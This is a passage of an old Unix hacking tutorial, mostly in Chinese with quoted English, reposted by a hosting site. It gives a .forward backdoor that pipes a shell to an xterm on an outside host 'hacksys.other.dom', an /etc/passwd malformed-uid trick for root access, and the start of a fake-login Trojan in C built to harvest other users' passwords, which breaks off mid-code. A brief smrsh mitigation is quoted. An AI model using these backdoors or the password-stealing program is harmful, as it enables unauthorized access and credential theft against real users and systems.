a common method of regaining access. For the account ``username''
a .forward file might be constructed as follows:
username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e
/bin/sh"
permutations of this method include alteration of the systems mail
aliases file (most commonly located at /etc/aliases). Note that
this is a simple permutation, the more advanced can run a simple
script from the forward file that can take arbitrary commands via
stdin (after minor preprocessing).
PS: The above method is also useful gaining access a companies
mailhub (assuming there is a shared a home directory FS on
the client and server).
> Using smrsh can effectively negate this backdoor (although it's quite
> possibly still a problem if you allow things like elm's filter or
> procmail which can run programs themselves...).
您也许要增加:
.forward后门
Unix下在.forward文档里放入命令是重新获得访问的常用方法. 帐户'username'
的
.forward可能配置如下:
username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e
/bin/sh"
这种方法的变形包括改变系统的mail的别名文档(通常位于/etc/aliases). 注意这只是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后).
>利用smrsh能够有效的制止这种后门(虽然假如允许能够自运行的elm's filter或procmail>类程式, 很有可能更有问题 ......)
( 此段的内容理解不深, 故付上英文, 请指教! )
---------------------------------------------------------------------------
您也许能用这个"特性"做后门:
当在/etc/password里指定一个错误的uid/gid后, 大多数login(1)的实现是不能检查出这个错误
的uid/gid, 而atoi(3)将设uid/gid为0, 便给了终极用户的权利.
例子:
rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh
在Linux里,这将把用户rmartin的uid设为0.
Hack技巧-使用Trogan HorsesUNIX 的特洛伊木马
------------------
Martin 翻译
序言
----------
"UNIX 安全" 是一种矛盾修饰法.他是一种能被暴力攻击法轻易攻破
的系统.(大多数UNIX系统不会因为多次错误的登录而挂起,而且他更有许多缺省的登录名如root,bin,sys,uccp等.)一旦您登录到系统,您就能轻易降服他,假如您会一点C语言,您就能让系统为您工作,并能完全避开系统的安全障碍建立您自己的登录,阅读任何人的文档,等.
本文将提供一些这方面的C的源码以供大家实践.
配置需要
您需要一个UNIX系统的有效帐号.为获得最好效果,最好使用工作在真正机子(一台PDP/11,VAX,Pyramid,等)上的完全的UNIX版本(如 4.2bsd or AT&T System V).假如您能在学校的系统中获得一个帐号那是再好但是了.
注意
本文受到86年4月的 issue of BYTE 中的一篇名叫"Making UNIX Secure."文章的启发而写的.在那篇文章中作者称"我们希望所提供的资料是有趣的但又不会成为'破坏者的菜谱'.我们常有意删除一些细节" 我根据此文的总体纲要,给出了基于他们所提到的方法的例子.
步骤一:获得口令
您所需要的技巧仅仅是一些最基本的UNIX及C语言的常识.但是,您得有能使用的终端如学校里计算中央里的.
当您向一个典型的UNIX系统登录时,您能看到如下这些:
Tiburon Systems 4.2bsd / System V (shark)
login: shark
Password: (并不显示)
我提供的程式能模拟一个登录过程.您在终端上运行这程式,然后离开.那些不知情的家伙假如来登录,他们的登录信息就会被保存成文档,并且屏幕上会显示"login incorrect"
那些家伙会被需要再登录一次.第二次是真正的登录,这时候他们都成功了.显然那些家伙并不聪明.
在系统上将下列源码生成文档'horse.c'. 因为系统有不同的版本,您可能需要修改前8行.
----- Code Begins Here -----
/* this is what a 'C' comment looks like. You can leave them out. */
/* #define's are like macros you can use for configuration. */
#define SYSTEM " Tiburon Systems 4.2bsd UNIX (shark) "
/* The above string should be made to look like the message that your
* system prints when ready. Each represents a carriage return.
*/
#define LOGIN "login: "
/* The above is the login prompt. You shouldn't have to change it
* unless you're running some strange version of UNIX.
*/
#define PASSWORD "password:"
/* The above is the password prompt. You shouldn't have to change
* it, either.
*/
#define WAIT 2
/* The numerical value assigned to WAIT is the delay you get after
* "password:" and before "login incorrect." Change it (0 = almost
* no delay, 5 = LONG delay) so it looks like your system's delay.
* realism is the key here - we don't want our target to become
* suspicious.
*/
#define INCORRECT "Login incorrect. "
/* Change the above so it is what your system says when an incorrect
* login is given. You shouldn't have to change it.
*/
#define FILENAME "stuff"
/* FILENAME is the name of the file that the hacked passwords will
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
